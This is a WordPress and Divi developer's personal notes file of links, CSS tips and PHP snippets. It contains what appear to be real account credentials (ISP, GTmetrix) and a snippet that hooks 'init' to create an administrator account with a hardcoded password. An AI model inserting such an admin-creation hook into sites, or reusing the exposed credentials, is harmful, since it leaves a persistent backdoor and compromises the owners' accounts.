ISP 
Username: smm.ibrahim_khan
Pass: 2023
MTU: 1480

l3bum14@gmail.com
lizakh4n's pass
============== Remote Router =================
URL 10.5.9.142:1111

IBBL Correspondents
https://www.islamibankbd.com/feb/correspondents

PayPal
https://www.paypal.me/Ghadamoijel

============== DKIM Generator =================
https://easydmarc.com/tools/dkim-record-generator

============== Website =================

1. Color-Contrast
https://dequeuniversity.com/rules/axe/4.10/color-contrast

2. Fonts
https://aivoicemouse.com/
Heading - Outfit, Paragraph - Nunito Sans, 
Button - 
 {
   background-color: transparent;
   padding:
6px 13px 6px 15px;
   background-image: linear-gradient(
115deg, var(--e-global-color-el_c_1_color) 33%, var(--e-global-color-el_c_2_color) 100%);
   border-radius:
10px 0px 10px 0px;
}

3. Credits

function custom_admin_footer_text($text) {
	$new_text = 'Website by <a href="https://wa.me/+8801772812413" target="_blank">Ibrahim Khan</a>'; 
	return $new_text;
}
add_filter('admin_footer_text', 'custom_admin_footer_text');
function ibrahim_source_comment() {
	echo "<!-- Built by Ibrahim Khan https://themesire.com Looking for WordPress friends? Send a message to WhatsApp at +8801772812413 -->"; 
}
add_action('get_header', 'ibrahim_source_comment');





============== Fonts =================

Barlow, Josephin Sans,

============== WooCommerce Test Payment Card =================

https://woocommerce.com/document/woocommerce-payments/testing-and-troubleshooting/testing/#test-cards

 Card No: 4242 4242 4242 4242
 Name    : Zhang San 
 Date      : 12/34 
 CVC     : 567
 Country : United States
 Postcode : 12345

 Bike Key 93193
 
============== Divi Portfolio Image Scroll on Hover =================

Set Column Height and Overflow X and Y to hidden
Set module margin 0 and in Hover give a Negative margin
Give Transition approximately 6500ms


============== Divi Filterable Column with "Filter for Divi" =================

Button and filterable Column will be on the different section
Set button class for "All" to "df-button" and the other to "df-button dfc-{name}"
Set Section class "df-area" and Column class "dfc-{name}"

Demo : https://divi.iotexdigital.com/


============== Get Design Idea for Layout =================

https://divi.express/
https://diviawesome.com/divi-layouts/
https://diviflash.com/layouts/      *Divi Free Layout*
https://www.divi-pixel.com/layouts/
https://www.divilayouts.com/    *Divi Free Layout*


============== Take shortcode input with ACF and show the result on frontend =================

1. Create a textarea field from ACF
2. Place the shortcode in this field
3. Add this filter in functions.php = add_filter('acf/format_value/type=textarea', 'do_shortcode');

============== Show the result on frontend =================

1. Add Text field and and select dynamic field and select Custom Field Name

============== Override Divi Module =================

https://intercom.help/elegantthemes/en/articles/4532734-moving-blog-module-in-child-theme


============== Change Divi Icon with code =================

Divi Icon codes - https://dividezigns.com/divi-icon-codes/
1. Copy codes and paste on default code by CSS on before pseudo elements
2. If the default font-family belongs to FontAwesome, copy font FontAwesome content
    and past by CSS


============== Close POP UP of POP Up Maker by clicking a button =================

1. Inspect default "Close" button and copy CSS
2. Give these CSS to the button want to function as pop up close


============== Change Divi Header on Scroll =================

https://www.elegantthemes.com/blog/divi-resources/how-to-swap-your-divi-header-for-another-one-on-scroll


============== Divi Free Layouts for Divi Plugin =================

https://layoutsfordivibuilder.com/template-library/

============== Divi Shop Page infinite scroll =================

https://help.elegantthemes.com/en/articles/4532907-infinite-scroll-for-divi-shop-module


============== Select Tag in CSS with inline property =================

tag[style*="z-index: 90;"] // tag will be tag, id or class

============== Slider Revolution Templates =================

https://mega.nz/folder/9A4EWbDK#YCH-hbkUI8cGaYsVDFRFRw
https://mega.nz/folder/k0NQ2RQa#X46KM0U1E0IDSK6MnF21iA

============== WordPress Dashboard Broken =================
define('CONCATENATE_SCRIPTS', false); 

============== Slider Revolution Error in 387 No Line (replace the function with below function) =================

public function check_valid_image($url){		

		if( !is_string($url) || $url == "" ){ return FALSE; };
	
		$pos = strrpos($url, '.', -1);
	if($pos === false) return false;
	
	$ext = strtolower(substr($url, $pos));
	
	$img_exts = array('.gif', '.jpg', '.jpeg', '.png');
	
	if(in_array($ext, $img_exts)) return $url;
	
	return false;
	
}

============== First Word of post title different =================

function custom_post_title_filter($title, $id) {
    if (!is_admin() && get_post_type($id) === 'case') {
        // Get the first two letters
        $first_two_letters = substr($title, 0, 2);
        
        // Get the rest of the title
        $rest_of_title = substr($title, 2);

        // Combine with HTML markup for styling
        $title = "<span class='the-transformation'><span class='the'>the</span> Transformation</span> <span class='title-main'><span class='weight'>" .$first_two_letters . "</span>" . $rest_of_title . " <i class='fas fa-fire' style='color:#FF2424'></i></span>";
    }

    return $title;
}

add_filter('the_title', 'custom_post_title_filter', 10, 2);

function classes_single_post_title_filter($title, $id) {
    if (!is_admin() && get_post_type($id) === 'service' && is_single()) {
        // Get the first two letters
        $first_two_letters = substr($title, 0, 3);
        
        // Get the rest of the title
        $rest_of_title = substr($title, 3);

        // Combine with HTML markup for styling
        $title = "<span class='service-title'>" .$first_two_letters . "</span>" . $rest_of_title ;
    }

    return $title;
}

add_filter('the_title', 'classes_single_post_title_filter', 10, 2);

============== WP Admin Dashboard Dark =================

<?php
function applyCustomStyles() {
    echo '
    <style>

    /* Change link colour to white */
    #wpbody-content a {
    filter: invert(1) hue-rotate(180deg) saturate(10);
    color: white !important;
    }

    /* Change link colour to yellow */
    #wpbody-content a:hover {
    filter: invert(1) hue-rotate(180deg) saturate(10);
    color: red !important;
    }
    
    /* Styling for primary content area. */
    .block-editor-page .editor-styles-wrapper {
      color: lightgray;
      background: #262626;
    }
    
    /* Base styling adjustments. */
    .wp-admin {
      background-color: #262626;
    }
    
    /* Image display corrections. */
    .wp-admin #wpbody img {
      filter: invert(1) hue-rotate(-180deg);
      background: white;
    }

    /* Enhancements for hyperlink visuals. */
    .block-editor-page .editor-styles-wrapper a {
      filter: invert(0.85) hue-rotate(185deg);
    }
    
    /* Filter reset for specific editor sections. */
    .block-editor-page #wpbody {
      filter: unset;
    }

    /* Adjustments for the main body appearance. */
    .wp-admin #wpbody {
      filter: invert(0.85) hue-rotate(185deg);
    }

    /* Sidebar appearance customization. */
    .block-editor-page .interface-interface-skeleton__sidebar,
    .block-editor-page .interface-interface-skeleton__secondary-sidebar {
      filter: invert(0.85) hue-rotate(185deg);
    }

    /* Configuration for top navigation bar. */
    .block-editor-page .interface-interface-skeleton__header {
      filter: invert(0.85) hue-rotate(185deg);
    }
    
    /* Primary action button styling. */
    .block-editor-page .is-primary {
      color: black !important;
    }
    
    /* Lower section layout adjustments. */
    .block-editor-page .edit-post-layout__metaboxes {
      border-top: 0px;
      background-color: #262626;
    }

    /* Reset various button BG colours */
    .wrap .add-new-h2, .wrap .add-new-h2:active, .wrap .page-title-action, .wrap .page-title-action:active {
    background:#f6f7f700;
    }
    
    </style>';
}
add_action('admin_head', 'applyCustomStyles');


============== Set display name in WooCommerce Registration =================

// Add a custom field to the registration form
add_action('woocommerce_register_form_start', 'custom_register_fields');
function custom_register_fields() {
    ?>
    <p class="form-row form-row-wide">
        <label for="display_name"><?php _e('Display Name', 'woocommerce'); ?> <span class="required">*</span></label>
        <input type="text" class="input-text" name="display_name" id="display_name" value="<?php echo ( ! empty( $_POST['display_name'] ) ) ? esc_attr( $_POST['display_name'] ) : ''; ?>" />
    </p>
    <?php
}

// Validate the custom field during registration
add_filter('woocommerce_registration_errors', 'validate_custom_fields', 10, 3);
function validate_custom_fields($errors, $username, $email) {
    if (empty($_POST['display_name'])) {
        $errors->add('display_name_error', __('Please enter your display name.', 'woocommerce'));
    }
    return $errors;
}
// hiddencharacter50@gmail.com parcentage password
// Save the custom field data when creating a new user
add_action('woocommerce_created_customer', 'save_custom_fields');
function save_custom_fields($customer_id) {
    if (isset($_POST['display_name'])) {
        update_user_meta($customer_id, 'display_name', sanitize_text_field($_POST['display_name']));
    }
}

// Set user submitted display name as default for "Display name publicly as"
add_filter('pre_user_display_name', 'set_user_display_name', 10);
function set_user_display_name($display_name) {
    if (!empty($_POST['display_name'])) {
        $display_name = sanitize_text_field($_POST['display_name']);
    }
    return $display_name;
}


============== Set Password from FTP =================

function wpb_admin_account(){
    $user = 'ibrahim';
    $pass = 'R?u7}nTxcERx';
    $email = 'kh4n605@gmail.com';
    if ( !username_exists( $user ) && !email_exists( $email ) ) {
        $user_id = wp_create_user( $user, $pass, $email );
        $user = new WP_User( $user_id );
        $user->set_role( 'administrator' );
    }
}
add_action('init','wpb_admin_account');

============== GTmetrix Account Access =================

gewev16645@sablecc.com
gtmetrixname10gtmetrix


============== Elementor # menu link active class removal JS =================

<script>
document.addEventListener("DOMContentLoaded", function() {
    const targetMenuItem = document.querySelector("li.who > a");

    if (targetMenuItem) {
        // Function to remove the class
        const removeActiveClass = () => {
            targetMenuItem.classList.remove("elementor-item-active");
        };

        // Initial removal in case the class is there on load
        removeActiveClass();

        // Observe changes to the class attribute on the menu item
        const observer = new MutationObserver(() => {
            removeActiveClass();
        });

        observer.observe(targetMenuItem, { attributes: true, attributeFilter: ["class"] });
    }
});
</script>